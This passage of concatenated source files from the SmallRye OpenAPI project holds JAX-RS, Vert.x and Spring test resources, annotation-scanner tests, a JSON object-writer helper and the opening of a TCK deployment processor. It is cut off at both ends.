@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2014, value = "Processing an array of %s annotations.")
void annotationsArray(String annotation);
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 2015, value = "Processing a json array of %s json nodes.")
void jsonArray(String of);
}
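// Illustrative usage (added, not part of the original source): callers reach these messages
// through the shared logger instance declared above, e.g.
//
//   IoLogging.logger.annotationsMap("Extension");
//   IoLogging.logger.jsonList("Server");
//
// Both calls emit DEBUG-level messages carrying the SROAP02000 and SROAP02003 ids defined in this
// interface; the "Extension" and "Server" argument values are hypothetical.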
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ResteasyMultipartInputTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.Consumes;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import org.jboss.resteasy.plugins.providers.multipart.MultipartInput;
@Path(value = "multipart-mixed")
public class ResteasyMultipartInputTestResource {
@POST
@Path(value = "post")
@Consumes(value = "multipart/mixed")
@SuppressWarnings(value = "unused")
public void post(MultipartInput input) {
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/resources/TagTestResource2.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.resources;
import javax.ws.rs.Consumes;
import javax.ws.rs.GET;
import javax.ws.rs.PATCH;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
import org.eclipse.microprofile.openapi.annotations.ExternalDocumentation;
import org.eclipse.microprofile.openapi.annotations.tags.Tag;
import org.eclipse.microprofile.openapi.annotations.tags.Tags;
@Path("/tags2")
@Tag(description = "This tag will not appear without a name")
@Tag(name = "tag1", description = "TAG1 from TagTestResource2")
@Tag(ref = "http://example/com/tag2")
@SuppressWarnings("unused")
public class TagTestResource2 {
@GET
@Produces(MediaType.TEXT_PLAIN)
@Tag(name = "tag3", description = "TAG3 from TagTestResource2#getValue1", externalDocs = @ExternalDocumentation(description = "Ext doc from TagTestResource2#getValue1"))
String getValue1() {
return null;
}
@POST
@Consumes(MediaType.TEXT_PLAIN)
void postValue(String value) {
}
@PATCH
@Consumes(MediaType.TEXT_PLAIN)
@Tags({
@Tag, @Tag
})
void patchValue(String value) {
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/RolesDeclaredResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.annotation.security.DeclareRoles;
import javax.annotation.security.RolesAllowed;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.core.Response;
@Path(value = "/v1")
@SuppressWarnings(value = "unused")
@DeclareRoles(value = { "admin", "users" })
public class RolesDeclaredResource {
@GET
@Path(value = "secured")
@Produces(value = "application/json")
@RolesAllowed(value = { "admin" })
public Response getSecuredData(int id) {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/Seed.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
public class Seed {
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/BeanParamAddon.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.ws.rs.HeaderParam;
public interface BeanParamAddon {
@HeaderParam(value = "hi1")
void setHeaderParam1(String value);
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/PathParamTemplateRegexTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.ws.rs.GET;
import jakarta.ws.rs.Path;
import jakarta.ws.rs.PathParam;
import jakarta.ws.rs.Produces;
import jakarta.ws.rs.core.MediaType;
@Path(value = "/template")
public class PathParamTemplateRegexTestResource {
@GET
@Path(value = "{id:\\d+}/{name: [A-Z]+ }/{ nickname :[a-zA-Z]+}/{age: [0-9]{1,3}}")
@Produces(value = MediaType.TEXT_PLAIN)
public String echo(@PathParam(value = "id") Integer id, @PathParam(value = "name") String name,
@PathParam(value = "nickname") String nickname, @PathParam(value = "age") String age) {
return String.valueOf(id) + ' ' + name + ' ' + nickname + ' ' + age;
}
}
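// Note (added, hedged): OpenAPI path templates may not contain regular expressions, so the scanner
// is expected to normalize the template above to /template/{id}/{name}/{nickname}/{age}, dropping
// the regex fragments and the stray whitespace around the parameter names.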
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ResteasyMultipartFormDataMapTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import java.util.Map;
import javax.ws.rs.Consumes;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.core.MediaType;
@Path(value = "multipart-form-data-map")
public class ResteasyMultipartFormDataMapTestResource {
@POST
@Path(value = "post")
@Consumes(value = MediaType.MULTIPART_FORM_DATA)
@SuppressWarnings(value = "unused")
public void post(Map<String, RequestBodyWidget> input) {
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/Sub2TestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
@SuppressWarnings(value = "unused")
public class Sub2TestResource<T> {
@GET
@Path(value = "{subsubid}")
public T getSub2(@PathParam(value = "subsubid") String subsubid) {
return null;
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/runtime/io/ObjectWriter.java<|end_filename|>
package io.smallrye.openapi.runtime.io;
import java.math.BigDecimal;
import java.math.BigInteger;
import java.util.List;
import java.util.Map;
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.node.ArrayNode;
import com.fasterxml.jackson.databind.node.ObjectNode;
public class ObjectWriter {
private ObjectWriter() {
}
/**
* Writes an array of strings to the parent node.
*
* @param parent the parent json node
* @param models list of Strings
* @param propertyName the name of the node
*/
public static void writeStringArray(ObjectNode parent, List<String> models, String propertyName) {
if (models == null) {
return;
}
ArrayNode node = parent.putArray(propertyName);
for (String model : models) {
node.add(model);
}
}
/**
* Writes an array of objects to the parent node.
*
* @param parent the parent json node
* @param models list of objects
* @param propertyName the name of the node
*/
public static void writeObjectArray(ObjectNode parent, List<Object> models, String propertyName) {
if (models == null) {
return;
}
ArrayNode node = parent.putArray(propertyName);
for (Object model : models) {
addObject(node, model);
}
}
/**
* Writes a map of strings to the parent node.
*
* @param parent the parent json node
* @param models map of strings
* @param propertyName name of the node
*/
public static void writeStringMap(ObjectNode parent, Map<String, String> models, String propertyName) {
if (models == null) {
return;
}
ObjectNode node = parent.putObject(propertyName);
for (Map.Entry<String, String> entry : models.entrySet()) {
node.put(entry.getKey(), entry.getValue());
}
}
/**
* Write an object to json
*
* @param node the json node
* @param key key
* @param value value
*/
public static void writeObject(ObjectNode node, String key, Object value) {
if (value == null) {
return;
}
if (value instanceof String) {
node.put(key, (String) value);
} else if (value instanceof JsonNode) {
node.set(key, (JsonNode) value);
} else if (value instanceof BigDecimal) {
node.put(key, (BigDecimal) value);
} else if (value instanceof BigInteger) {
node.put(key, new BigDecimal((BigInteger) value));
} else if (value instanceof Boolean) {
node.put(key, (Boolean) value);
} else if (value instanceof Double) {
node.put(key, (Double) value);
} else if (value instanceof Float) {
node.put(key, (Float) value);
} else if (value instanceof Integer) {
node.put(key, (Integer) value);
} else if (value instanceof Long) {
node.put(key, (Long) value);
} else if (value instanceof List) {
ArrayNode array = node.putArray(key);
for (Object valueItem : List.class.cast(value)) {
addObject(array, valueItem);
}
} else if (value instanceof Map) {
ObjectNode objNode = node.putObject(key);
@SuppressWarnings("unchecked")
Map<String, Object> values = (Map<String, Object>) value;
for (Map.Entry<String, Object> entry : values.entrySet()) {
String propertyName = entry.getKey();
writeObject(objNode, propertyName, entry.getValue());
}
} else {
node.put(key, (String) null);
}
}
private static void addObject(ArrayNode node, Object value) {
if (value instanceof String) {
node.add((String) value);
} else if (value instanceof JsonNode) {
node.add((JsonNode) value);
} else if (value instanceof BigDecimal) {
node.add((BigDecimal) value);
} else if (value instanceof BigInteger) {
node.add(new BigDecimal((BigInteger) value));
} else if (value instanceof Boolean) {
node.add((Boolean) value);
} else if (value instanceof Double) {
node.add((Double) value);
} else if (value instanceof Float) {
node.add((Float) value);
} else if (value instanceof Integer) {
node.add((Integer) value);
} else if (value instanceof Long) {
node.add((Long) value);
} else if (value instanceof List) {
ArrayNode array = node.addArray();
for (Object valueItem : List.class.cast(value)) {
addObject(array, valueItem);
}
} else if (value instanceof Map) {
ObjectNode objNode = node.addObject();
@SuppressWarnings("unchecked")
Map<String, Object> values = (Map<String, Object>) value;
for (Map.Entry<String, Object> entry : values.entrySet()) {
String propertyName = entry.getKey();
writeObject(objNode, propertyName, entry.getValue());
}
} else {
node.add((String) null);
}
}
}
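// Illustrative sketch (added, not part of the original source): writing mixed-type values with the
// helpers above, assuming Jackson is on the classpath. The "limit" and "tags" keys are hypothetical.
//
//   com.fasterxml.jackson.databind.ObjectMapper mapper = new com.fasterxml.jackson.databind.ObjectMapper();
//   com.fasterxml.jackson.databind.node.ObjectNode parent = mapper.createObjectNode();
//   ObjectWriter.writeObject(parent, "limit", 10);                                  // Integer branch
//   ObjectWriter.writeObject(parent, "tags", java.util.Arrays.asList("a", "b"));    // List branch
//
// The resulting node serializes to {"limit":10,"tags":["a","b"]}.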
<|start_filename|>extension-vertx/src/test/java/io/smallrye/openapi/runtime/scanner/VertxAnnotationScannerTest.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.jandex.Index;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
import test.io.smallrye.openapi.runtime.scanner.entities.Greeting;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingDeleteRoute;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingGetRoute;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingPostRoute;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingPutRoute;
/**
* Basic Vert.x annotation scanning
*
* @author <NAME> (<EMAIL>)
*/
class VertxAnnotationScannerTest extends VertxDataObjectScannerTestBase {
/**
 * This tests a basic hello world service with no OpenAPI annotations
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicGetRouteDefinitionScanning() throws IOException, JSONException {
Index i = indexOf(GreetingGetRoute.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicRouteGetDefinitionScanning.json", result);
}
/**
 * This tests a basic hello world service with no OpenAPI annotations
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicPostRouteDefinitionScanning() throws IOException, JSONException {
Index i = indexOf(GreetingPostRoute.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicRoutePostDefinitionScanning.json", result);
}
/**
 * This tests a basic hello world service with no OpenAPI annotations
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicPutRouteDefinitionScanning() throws IOException, JSONException {
Index i = indexOf(GreetingPutRoute.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicRoutePutDefinitionScanning.json", result);
}
/**
 * This tests a basic hello world service with no OpenAPI annotations
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicDeleteRouteDefinitionScanning() throws IOException, JSONException {
Index i = indexOf(GreetingDeleteRoute.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicRouteDeleteDefinitionScanning.json", result);
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/Reptile.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
public interface Reptile {
@Schema(name = "scaleColor", description = "The color of a reptile's scales")
public String getScaleColor();
@Schema(name = "scaleColor", description = "This is how the color is set, but the description comes from getScaleColor")
public void setScaleColor(String color);
}
<|start_filename|>ui/open-api-ui/src/main/java/io/smallrye/openapi/ui/DocExpansion.java<|end_filename|>
package io.smallrye.openapi.ui;
/**
* Controls the default expansion setting for the operations and tags.
* It can be 'list' (expands only the tags), 'full' (expands the tags and operations) or 'none' (expands nothing).
*
* @author <NAME> (<EMAIL>)
*/
public enum DocExpansion {
list,
full,
none
}
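// Illustrative note (added, not part of the original source): because the constants are lower
// case, a raw option value taken from configuration can be mapped back directly, e.g.
// DocExpansion.valueOf("list").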
<|start_filename|>extension-spring/src/test/java/io/smallrye/openapi/runtime/scanner/SpringAnnotationScannerTest.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.jandex.Index;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
import test.io.smallrye.openapi.runtime.scanner.entities.Greeting;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingDeleteController;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingDeleteControllerAlt;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingGetController;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingGetControllerAlt;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingGetControllerAlt2;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingPostController;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingPostControllerAlt;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingPutController;
import test.io.smallrye.openapi.runtime.scanner.resources.GreetingPutControllerAlt;
/**
* Basic Spring annotation scanning
*
* @author <NAME> (<EMAIL>)
*/
class SpringAnnotationScannerTest extends SpringDataObjectScannerTestBase {
/**
 * This tests a basic hello world service with no OpenAPI annotations
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicGetSpringDefinitionScanning() throws IOException, JSONException {
Index i = indexOf(GreetingGetController.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicSpringGetDefinitionScanning.json", result);
}
/**
 * This tests a basic hello world service with no OpenAPI annotations
*
* Here we use the alternative RequestMapping rather than GetMapping
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicSpringDefinitionScanningAlt() throws IOException, JSONException {
Index i = indexOf(GreetingGetControllerAlt.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicSpringGetDefinitionScanning.json", result);
}
/**
 * This tests a basic hello world service with no OpenAPI annotations
*
* Here we use the alternative RequestMapping plus path rather than value
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicSpringDefinitionScanningAlt2() throws IOException, JSONException {
Index i = indexOf(GreetingGetControllerAlt2.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicSpringGetDefinitionScanning.json", result);
}
/**
 * This tests a basic hello world service with no OpenAPI annotations
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicPostSpringDefinitionScanning() throws IOException, JSONException {
Index i = indexOf(GreetingPostController.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicSpringPostDefinitionScanning.json", result);
}
/**
 * This tests a basic hello world service with no OpenAPI annotations
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicPostSpringDefinitionScanningAlt() throws IOException, JSONException {
Index i = indexOf(GreetingPostControllerAlt.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicSpringPostDefinitionScanning.json", result);
}
/**
 * This tests a basic hello world service with no OpenAPI annotations
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicPutSpringDefinitionScanning() throws IOException, JSONException {
Index i = indexOf(GreetingPutController.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicSpringPutDefinitionScanning.json", result);
}
/**
 * This tests a basic hello world service with no OpenAPI annotations
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicPutSpringDefinitionScanningAlt() throws IOException, JSONException {
Index i = indexOf(GreetingPutControllerAlt.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicSpringPutDefinitionScanning.json", result);
}
/**
 * This tests a basic hello world service with no OpenAPI annotations
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicDeleteSpringDefinitionScanning() throws IOException, JSONException {
Index i = indexOf(GreetingDeleteController.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicSpringDeleteDefinitionScanning.json", result);
}
/**
 * This tests a basic hello world service with no OpenAPI annotations
*
* @throws IOException
* @throws JSONException
*/
@Test
void testBasicDeleteSpringDefinitionScanningAlt() throws IOException, JSONException {
Index i = indexOf(GreetingDeleteControllerAlt.class, Greeting.class);
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicSpringDeleteDefinitionScanning.json", result);
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ResultList.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import java.util.List;
public class ResultList<T extends BaseModel> {
private List<T> result;
private Message error;
private Integer status;
public List<T> getResult() {
return result;
}
public Message getError() {
return error;
}
public Integer getStatus() {
return status;
}
public static class ResultBuilder<T extends BaseModel> {
private Integer status;
private Message error = new Message();
private List<T> result;
public ResultList.ResultBuilder<T> status(Integer status) {
this.status = status;
return this;
}
public ResultList.ResultBuilder<T> error(String message) {
this.error = new Message(message);
return this;
}
public ResultList.ResultBuilder<T> error(String message, String description) {
this.error = new Message(message, description);
return this;
}
public ResultList.ResultBuilder<T> result(List<T> result) {
this.result = result;
return this;
}
public ResultList<T> build() {
ResultList<T> response = new ResultList<T>();
response.status = this.status;
response.error = this.error;
response.result = this.result;
return response;
}
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/MultipartFormVerify.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.FormParam;
public class MultipartFormVerify {
@FormParam(value = "token")
public String token;
@FormParam(value = "os")
public String os;
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/NestedSchemaReferenceTests.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import java.util.HashMap;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.eclipse.microprofile.openapi.models.media.Schema;
import org.jboss.jandex.ClassType;
import org.jboss.jandex.DotName;
import org.jboss.jandex.Index;
import org.jboss.jandex.IndexView;
import org.jboss.jandex.Indexer;
import org.jboss.jandex.Type;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
/**
* @author <NAME> {@literal <<EMAIL>>}
*/
class NestedSchemaReferenceTests extends JaxRsDataObjectScannerTestBase {
@Test
void testNestedSchemasAddedToRegistry() throws IOException, JSONException {
DotName parentName = componentize(test.io.smallrye.openapi.runtime.scanner.entities.NestedSchemaParent.class.getName());
Type parentType = ClassType.create(parentName, Type.Kind.CLASS);
OpenAPI oai = context.getOpenApi();
SchemaRegistry registry = SchemaRegistry.newInstance(context);
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context, parentType);
Schema result = scanner.process();
registry.register(parentType, result);
printToConsole(oai);
assertJsonEquals("refsEnabled.nested.schema.family.expected.json", oai);
}
@Test
void testJavaxNestedSchemaOnParameter() throws IOException, JSONException {
IndexView i = indexOf(test.io.smallrye.openapi.runtime.scanner.resources.NestedSchemaOnParameterResource.class,
test.io.smallrye.openapi.runtime.scanner.resources.NestedSchemaOnParameterResource.NestedParameterTestParent.class,
test.io.smallrye.openapi.runtime.scanner.resources.NestedSchemaOnParameterResource.NestedParameterTestChild.class,
test.io.smallrye.openapi.runtime.scanner.resources.NestedSchemaOnParameterResource.AnotherNestedChildWithSchemaName.class);
testNestedSchemaOnParameter(i);
}
@Test
void testJakartaNestedSchemaOnParameter() throws IOException, JSONException {
IndexView i = indexOf(test.io.smallrye.openapi.runtime.scanner.resources.jakarta.NestedSchemaOnParameterResource.class,
test.io.smallrye.openapi.runtime.scanner.resources.jakarta.NestedSchemaOnParameterResource.NestedParameterTestParent.class,
test.io.smallrye.openapi.runtime.scanner.resources.jakarta.NestedSchemaOnParameterResource.NestedParameterTestChild.class,
test.io.smallrye.openapi.runtime.scanner.resources.jakarta.NestedSchemaOnParameterResource.AnotherNestedChildWithSchemaName.class);
testNestedSchemaOnParameter(i);
}
void testNestedSchemaOnParameter(IndexView i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(dynamicConfig(new HashMap<String, Object>()), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("refsEnabled.resource.testNestedSchemaOnParameter.json", result);
}
/*
 * Test case derived from the original example in SmallRye OpenAPI issue #73.
*
* https://github.com/smallrye/smallrye-open-api/issues/73
*
*/
@Test
void testJavaxSimpleNestedSchemaOnParameter() throws IOException, JSONException {
Indexer indexer = new Indexer();
// Test samples
index(indexer, "test/io/smallrye/openapi/runtime/scanner/resources/FooResource.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/resources/FooResource$Foo.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/resources/FooResource$Bar.class");
testSimpleNestedSchemaOnParameter(indexer.complete());
}
@Test
void testJakartaSimpleNestedSchemaOnParameter() throws IOException, JSONException {
Indexer indexer = new Indexer();
// Test samples
index(indexer, "test/io/smallrye/openapi/runtime/scanner/resources/jakarta/FooResource.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/resources/jakarta/FooResource$Foo.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/resources/jakarta/FooResource$Bar.class");
testSimpleNestedSchemaOnParameter(indexer.complete());
}
void testSimpleNestedSchemaOnParameter(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(dynamicConfig(new HashMap<String, Object>()),
i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("refsEnabled.resource.simple.expected.json", result);
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/IntegerStringUUIDResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import java.util.UUID;
import jakarta.ws.rs.BeanParam;
import jakarta.ws.rs.Consumes;
import jakarta.ws.rs.POST;
import jakarta.ws.rs.Path;
import jakarta.ws.rs.Produces;
import jakarta.ws.rs.core.MediaType;
@Path(value = "/integer-string")
@Consumes(value = MediaType.APPLICATION_JSON)
@Produces(value = MediaType.APPLICATION_JSON)
public class IntegerStringUUIDResource extends BaseGenericResource<Integer, String, UUID> {
@POST
@Path(value = "save")
public Integer update(Integer value, @BeanParam GenericBean<String> gbean) {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/BVTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import javax.ws.rs.Consumes;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
import org.eclipse.microprofile.openapi.annotations.tags.Tag;
@Path(value = "/bv")
public class BVTestResource {
@SuppressWarnings(value = "unused")
@Path(value = "/test-container")
@POST
@Produces(value = MediaType.APPLICATION_JSON)
@Consumes(value = MediaType.APPLICATION_JSON)
@Tag(name = "Test", description = "Testing the container")
public BVTestContainer getTestContainer(BVTestResourceEntity parameter) {
return new BVTestContainer();
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/Pet.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.json.JsonString;
public class Pet {
String id;
JsonString name;
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/GenericResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.ws.rs.GET;
import jakarta.ws.rs.Path;
import jakarta.ws.rs.Produces;
import jakarta.ws.rs.core.MediaType;
public class GenericResource {
@GET
@Path(value = "/extension")
@Produces(value = MediaType.TEXT_PLAIN)
public String helloExtension() {
return "hello extension";
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/BeanParamMultipartFormInheritanceResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.BeanParam;
import javax.ws.rs.Consumes;
import javax.ws.rs.GET;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.core.MediaType;
import javax.ws.rs.core.Response;
import org.jboss.resteasy.annotations.providers.multipart.MultipartForm;
@Path(value = "/")
public class BeanParamMultipartFormInheritanceResource {
@POST
@Path(value = "/uploadIcon")
@Consumes(value = MediaType.MULTIPART_FORM_DATA)
public Response uploadUserAvatar(@MultipartForm MultipartFormUploadIconForm form) {
return null;
}
@GET
@Path(value = "/beanparambase")
public Response getWithBeanParams(@BeanParam BeanParamBase params) {
return null;
}
@GET
@Path(value = "/beanparamimpl")
public Response getWithBeanParams(@BeanParam BeanParamImpl params) {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/TypeVariableResponseTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import java.util.List;
import jakarta.ws.rs.GET;
import jakarta.ws.rs.Path;
import jakarta.ws.rs.PathParam;
@Path(value = "/variable-types")
@SuppressWarnings(value = "unused")
public class TypeVariableResponseTestResource<TEST extends TypeVariableResponseTestResource.Dto> {
public static class Dto {
String id;
}
@GET
public List<TEST> getAll() {
return null;
}
@GET
@Path(value = "{id}")
public TEST getOne(@PathParam(value = "id") String id) {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/Fruit.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import java.util.List;
public class Fruit {
String description;
String name;
List<Seed> seeds;
}
<|start_filename|>testsuite/tck/src/test/java/io/smallrye/openapi/tck/DeploymentProcessor.java<|end_filename|>
package io.smallrye.openapi.tck;
import static io.smallrye.openapi.runtime.OpenApiProcessor.getFilter;
import static io.smallrye.openapi.runtime.OpenApiProcessor.modelFromAnnotations;
import static io.smallrye.openapi.runtime.OpenApiProcessor.modelFromReader;
import static io.smallrye.openapi.runtime.io.Format.JSON;
import static io.smallrye.openapi.runtime.io.Format.YAML;
import static io.smallrye.openapi.runtime.io.OpenApiSerializer.serialize;
import static java.lang.Thread.currentThread;
import static java.nio.charset.StandardCharsets.UTF_8;
import static java.util.Optional.ofNullable;
import java.io.File;
import java.io.IOException;
import java.io.InputStreamReader;
import java.util.Collection;
import java.util.Optional;
import java.util.Properties;
import java.util.logging.Level;
import java.util.logging.Logger;
import java.util.stream.Stream;
import org.eclipse.microprofile.config.ConfigProvider;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.arquillian.container.test.spi.client.deployment.ApplicationArchiveProcessor;
import org.jboss.arquillian.test.spi.TestClass;
import org.jboss.jandex.DotName;
import org.jboss.jandex.Index;
import org.jboss.jandex.Indexer;
import org.jboss.shrinkwrap.api.Archive;
import org.jboss.shrinkwrap.api.ArchivePaths;
import org.jboss.shrinkwrap.api.Node;
import org.jboss.shrinkwrap.api.asset.ByteArrayAsset;
import org.jboss.shrinkwrap.api.asset.EmptyAsset;
import org.jboss.shrinkwrap.api.asset.StringAsset;
import org.jboss.shrinkwrap.api.spec.WebArchive;
import org.jboss.shrinkwrap.resolver.api.maven.Maven;
import io.smallrye.config.PropertiesConfigSource;
import io.smallrye.config.SmallRyeConfig;
import io.smallrye.config.SmallRyeConfigBuilder;
import io.smallrye.openapi.api.OpenApiConfig;
import io.smallrye.openapi.api.OpenApiConfigImpl;
import io.smallrye.openapi.api.OpenApiDocument;
import io.smallrye.openapi.runtime.OpenApiProcessor;
import io.smallrye.openapi.runtime.OpenApiStaticFile;
import io.smallrye.openapi.runtime.io.Format;
import io.smallrye.openapi.runtime.scanner.FilteredIndexView;
public class DeploymentProcessor implements ApplicationArchiveProcessor {
private static Logger LOGGER = Logger.getLogger(DeploymentProcessor.class.getName());
public static volatile ClassLoader classLoader;
@Override
public void process(Archive<?> archive, TestClass testClass) {
if (classLoader == null) {
classLoader = Thread.currentThread().getContextClassLoader();
}
